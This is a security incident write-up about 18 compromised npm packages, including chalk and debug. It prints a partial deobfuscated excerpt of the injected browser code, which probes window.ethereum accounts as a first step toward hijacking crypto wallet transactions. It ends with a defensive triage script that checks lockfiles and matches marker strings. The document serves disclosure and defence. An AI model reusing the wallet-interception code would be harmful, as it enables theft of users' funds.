NPM debug and chalk packages compromised

https://news.ycombinator.com/rss Hits: 12
Summary

Starting on September 8th at 13:16 UTC, our Aikido intel feed alerted us to a series of packages being pushed to npm which appeared to contain malicious code. These were 18 very popular packages:

- backslash (0.26m downloads per week)
- chalk-template (3.9m downloads per week)
- supports-hyperlinks (19.2m downloads per week)
- has-ansi (12.1m downloads per week)
- simple-swizzle (26.26m downloads per week)
- color-string (27.48m downloads per week)
- error-ex (47.17m downloads per week)
- color-name (191.71m downloads per week)
- is-arrayish (73.8m downloads per week)
- slice-ansi (59.8m downloads per week)
- color-convert (193.5m downloads per week)
- wrap-ansi (197.99m downloads per week)
- ansi-regex (243.64m downloads per week)
- supports-color (287.1m downloads per week)
- strip-ansi (261.17m downloads per week)
- chalk (299.99m downloads per week)
- debug (357.6m downloads per week)
- ansi-styles (371.41m downloads per week)

The packages were updated to contain a piece of code that would be executed on the client of a website, which silently intercepts crypto and web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations so that funds and approvals are redirected to attacker-controlled accounts without any obvious signs to the user.

What happened?

The above packages all started having new versions released, an example here being is-arrayish. We can see that the index.js file is modified, and contains obfuscated code. After applying a bit of deobfuscation to it, we get a fairly complex piece of code still:

    var neth = 0;
    var rund = 0;
    var loval = 0;

    async function checkethereumw() {
      try {
        const _0x124ed3 = await window.ethereum.request({ 'method': "eth_accounts" });
        if (_0x124ed3.length > 0) {
          runmask();
          if (rund != 1) {
            rund = 1;
            neth = 1;
            newdlocal();
          }
        } else if (rund != 1) {
          rund = 1;
          newdlocal();
        }
      } catch (_0x53a897) {
        if (rund != 1) {
          rund = 1;
          newdlocal();
        }
      }
    }

    if (typeof window != "undefined" && typeof window.ethereum != "undefined") {
      checkethereumw();
    } else if (rund != 1)
...
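
A triage sketch for the incident described above, as an added example that is not code from the original write-up: it lists every resolved copy of the 18 named packages in a package-lock.json and checks source text for the function names visible in the deobfuscated snippet. Assumptions: npm lockfileVersion 2 or 3, index.js as the file to inspect (as in the is-arrayish example), a hypothetical script name triage.js, and a constructed sample lockfile with placeholder versions, since the summary does not state which versions were affected.

```javascript
// Added example (not from the original write-up): triage for the packages named above.
// Assumes npm lockfileVersion 2 or 3, which records installs under a "packages" map.
const AFFECTED = new Set(["backslash", "chalk-template", "supports-hyperlinks", "has-ansi",
  "simple-swizzle", "color-string", "error-ex", "color-name", "is-arrayish", "slice-ansi",
  "color-convert", "wrap-ansi", "ansi-regex", "supports-color", "strip-ansi", "chalk",
  "debug", "ansi-styles"]);

// Function names visible in the deobfuscated snippet on this page. Heuristic only:
// a build obfuscated differently would not contain these strings.
const MARKERS = ["checkethereumw", "runmask", "newdlocal"];

// Constructed sample lockfile; versions are placeholders, not known-bad versions.
const SAMPLE_LOCK = { lockfileVersion: 3, packages: {
  "": { name: "demo-app", version: "1.0.0" },
  "node_modules/chalk": { version: "0.0.0-example" },
  "node_modules/express": { version: "0.0.0-example" },
  "node_modules/some-dep/node_modules/ansi-regex": { version: "0.0.0-example" },
  "node_modules/@scope/debug": { version: "0.0.0-example" },
} };

// Return every installed copy (top-level or nested) of an affected package.
function affectedInLock(lock) {
  const hits = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    const idx = key.lastIndexOf("node_modules/");
    if (idx === -1) continue; // root project or workspace entry
    const name = key.slice(idx + "node_modules/".length);
    if (AFFECTED.has(name)) hits.push({ name, version: meta.version, path: key });
  }
  return hits;
}

// Return the marker strings present in one file's source text.
function markersIn(source) {
  return MARKERS.filter((m) => source.includes(m));
}

// CLI use: node triage.js <project-dir>; reads package-lock.json and each hit's index.js.
if (typeof require !== "undefined" && process.argv[2]) {
  const fs = require("fs"), path = require("path");
  const root = process.argv[2];
  const lock = JSON.parse(fs.readFileSync(path.join(root, "package-lock.json"), "utf8"));
  for (const hit of affectedInLock(lock)) {
    const file = path.join(root, hit.path, "index.js");
    const found = fs.existsSync(file) ? markersIn(fs.readFileSync(file, "utf8")) : [];
    console.log(`${hit.name}@${hit.version} ${hit.path} markers=[${found.join(",")}]`);
  }
}
```

An empty markers list is not a clean bill of health; compare the reported versions against the registry's advisory for each package.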

First seen: 2025-09-08 15:45

Last seen: 2025-09-09 02:49